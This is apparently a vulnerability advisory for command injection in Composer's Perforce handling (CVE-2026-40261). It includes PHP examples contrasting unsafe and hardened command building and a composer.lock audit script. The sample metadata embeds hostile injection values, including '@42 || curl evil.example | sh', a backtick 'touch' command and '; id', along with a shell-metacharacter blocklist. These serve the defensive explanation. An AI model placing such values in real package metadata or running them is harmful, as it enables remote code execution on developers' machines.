PT-2026-32622 · Composer · Composer

Published 2026-04-14 · Updated 2026-04-16 · CVE-2026-40261

CVSS v3.1: 8.8 High (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Name of the Vulnerable Software and Affected Versions: Composer versions 1.0 through 2.2.26; Composer versions 2.3 through 2.9.5
Description: Command injection is possible through the Perforce::syncCodeBase() method, which appends the $sourceReference parameter to a shell command without proper escaping. Additionally, the Perforce::generateP4Command() method interpolates user-supplied Perforce connection parameters (port, user, client) taken from the source url field without proper escaping. An attacker can inject arbitrary commands via crafted source reference or source url values containing shell metacharacters, even if Perforce is not installed: the shell parses the assembled command line before it looks up the p4 binary, so a value such as "@42; id" runs the injected command whether or not p4 exists. These values are provided as part of package metadata, so any compromised or malicious repository can serve malicious values. The issue is exploitable when installing or updating dependencies from source, including the default behavior for dev-prefixed versions.
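The following is an added illustration for this advisory, not code from Composer. It models the pattern the description reports (package metadata values joined into a shell command string without escaping) beside two hardened forms, and adds an allowlist check that rejects implausible values before any command is built. The p4 argument layout, the field names and the sample metadata are assumptions made for the example; nothing here reproduces Composer's actual Perforce methods.

```php
<?php
declare(strict_types=1);

// Constructed package metadata of the kind a malicious repository could serve.
// Every value except 'user' carries shell metacharacters; none is a real package.
$maliciousSource = [
    'port'      => '1666; id',                       // crafted port field from the source url
    'user'      => 'build',                          // harmless user field
    'client'    => 'ws`touch /tmp/pwned`',           // crafted client field from the source url
    'reference' => '@42 || curl evil.example | sh',  // crafted source reference
];

// Vulnerable pattern (hypothetical, modelled on the advisory): values are
// concatenated into one string that a shell parses, so ';', '||' and backticks
// inside any value become separate commands.
function buildSyncCommandUnsafe(array $s): string
{
    return 'p4 -p ' . $s['port'] . ' -u ' . $s['user']
        . ' -c ' . $s['client'] . ' sync ' . $s['reference'];
}

// Hardened pattern 1: every untrusted value is quoted as exactly one argument.
// escapeshellarg() wraps the value in single quotes and neutralises embedded quotes.
function buildSyncCommandSafe(array $s): string
{
    return 'p4 -p ' . escapeshellarg($s['port']) . ' -u ' . escapeshellarg($s['user'])
        . ' -c ' . escapeshellarg($s['client']) . ' sync ' . escapeshellarg($s['reference']);
}

// Hardened pattern 2: no shell at all. PHP 7.4+ proc_open() (and Symfony Process)
// accept an argv array and exec the program directly, so metacharacters stay
// plain bytes inside a single argument. Pass the array as the first argument of
// proc_open() instead of a command string.
function buildSyncArgv(array $s): array
{
    return ['p4', '-p', $s['port'], '-u', $s['user'], '-c', $s['client'], 'sync', $s['reference']];
}

// Defence in depth: reject values that cannot be a valid Perforce reference or
// connection field before they reach any command builder. The allowlist is a
// conservative assumption (changelist/label/revision syntax plus path characters).
function isPlausiblePerforceValue(string $value): bool
{
    return preg_match('/^[A-Za-z0-9@#._\/:-]+$/', $value) === 1;
}

// Blocklist view of the same problem, useful for scanning metadata you did not write.
function containsShellMetacharacters(string $value): bool
{
    return preg_match('/[;&|`$<>()\s\'"\\\\]/', $value) === 1;
}

// Demo: compare what each builder produces for the crafted metadata, then show
// which fields the validator would refuse.
echo "unsafe: " . buildSyncCommandUnsafe($maliciousSource) . PHP_EOL;
echo "safe:   " . buildSyncCommandSafe($maliciousSource) . PHP_EOL;
echo "argv:   " . json_encode(buildSyncArgv($maliciousSource)) . PHP_EOL;

foreach ($maliciousSource as $field => $value) {
    if (!isPlausiblePerforceValue($value) || containsShellMetacharacters($value)) {
        echo "reject {$field}: " . var_export($value, true) . PHP_EOL;
    }
}
```

The unsafe builder yields a line in which `id`, the backtick-quoted `touch`, and the piped `curl ... | sh` are all separate shell commands; the escaped form passes each value to p4 as one argument, and the argv form never involves a shell. Of the three, the argument-array exec is the strongest because it does not depend on getting quoting right for every platform shell; the allowlist check is worth keeping in front of it anyway, since a value like `@42 || curl ...` has no legitimate meaning as a Perforce reference.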
Recommendations: Update versions 1.0 through 2.2.26 to 2.2.27. Update versions 2.3 through 2.9.5 to 2.9.6. Avoid installing dependencies from source by passing --prefer-dist or by setting the preferred-install config option to dist (for example with `composer config preferred-install dist`); note that a package without a dist entry still has to be fetched from source. Only use trusted Composer repositories.
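To act on the recommendations above in an existing project, the following added example (not a Composer feature) audits a composer.lock for packages that would reach the affected code path: Perforce sources, shell metacharacters in their url or reference, dev-prefixed versions (installed from source by default), and packages with no dist entry that --prefer-dist cannot help. It also checks composer.json for an explicit preferred-install of dist. The lock and config contents are constructed inline; package names, hosts and values are made up for illustration.

```php
<?php
declare(strict_types=1);

// Constructed composer.lock excerpt (not a real project). The second package models
// metadata a malicious repository could serve; the third is a clean Perforce source.
const SAMPLE_LOCK = <<<'JSON'
{
  "packages": [
    {"name": "acme/safe-lib", "version": "1.4.0",
     "source": {"type": "git", "url": "https://github.com/acme/safe-lib.git", "reference": "0123abcd"},
     "dist":   {"type": "zip", "url": "https://api.github.com/repos/acme/safe-lib/zipball/0123abcd"}},
    {"name": "acme/p4-tool", "version": "dev-main",
     "source": {"type": "perforce", "url": "perforce.example.com:1666; id", "reference": "@42 || sh -c 'curl evil.example'"}},
    {"name": "acme/p4-clean", "version": "2.0.1",
     "source": {"type": "perforce", "url": "perforce.example.com:1666", "reference": "@100"},
     "dist":   {"type": "zip", "url": "https://mirror.example.com/acme/p4-clean-2.0.1.zip"}}
  ],
  "packages-dev": []
}
JSON;

// Constructed composer.json excerpt with the recommended setting applied.
const SAMPLE_CONFIG = '{"name": "acme/app", "config": {"preferred-install": "dist"}}';

function containsShellMetacharacters(string $value): bool
{
    return preg_match('/[;&|`$<>()\s\'"\\\\]/', $value) === 1;
}

/** Returns one finding per risky package, keyed by name: version plus the reasons. */
function auditLock(string $lockJson): array
{
    $lock = json_decode($lockJson, true, 512, JSON_THROW_ON_ERROR);
    $findings = [];
    foreach (array_merge($lock['packages'] ?? [], $lock['packages-dev'] ?? []) as $pkg) {
        $source  = $pkg['source'] ?? [];
        $reasons = [];
        if (($source['type'] ?? '') === 'perforce') {
            $reasons[] = 'perforce source (affected code path)';
            foreach (['url', 'reference'] as $field) {
                if (containsShellMetacharacters((string) ($source[$field] ?? ''))) {
                    $reasons[] = "shell metacharacters in source.{$field}";
                }
            }
        }
        // str_starts_with() needs PHP 8; use strncmp() on older interpreters.
        if (str_starts_with((string) ($pkg['version'] ?? ''), 'dev-')) {
            $reasons[] = 'dev- version: installed from source by default';
        }
        if ($reasons !== [] && !isset($pkg['dist'])) {
            $reasons[] = 'no dist entry, so --prefer-dist cannot avoid the source checkout';
        }
        if ($reasons !== []) {
            $findings[$pkg['name']] = ['version' => $pkg['version'], 'reasons' => $reasons];
        }
    }
    return $findings;
}

// True only when composer.json explicitly sets preferred-install to "dist".
// Composer also accepts a per-package map here; this check treats a map as not set,
// which is the conservative answer for an audit.
function prefersDist(string $composerJson): bool
{
    $config = json_decode($composerJson, true, 512, JSON_THROW_ON_ERROR);
    return ($config['config']['preferred-install'] ?? null) === 'dist';
}

// Demo over the constructed inputs.
foreach (auditLock(SAMPLE_LOCK) as $name => $finding) {
    echo "{$name} {$finding['version']}: " . implode('; ', $finding['reasons']) . PHP_EOL;
}
echo 'preferred-install=dist set: ' . (prefersDist(SAMPLE_CONFIG) ? 'yes' : 'no') . PHP_EOL;
```

On the sample lock, acme/p4-tool is flagged for all five reasons and acme/p4-clean only for being a Perforce source (it has a dist entry, so --prefer-dist keeps it off the affected path); acme/safe-lib produces no finding. Findings with "no dist entry" are the ones that only a Composer upgrade (2.2.27 or 2.9.6 per the advisory) or removal of the repository actually fixes.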

Exploit · Fix · RCE · OS Command Injection

Weakness Enumeration

Related Identifiers: CVE-2026-40261, GHSA-GQW4-4W2P-838Q

Affected Products: Composer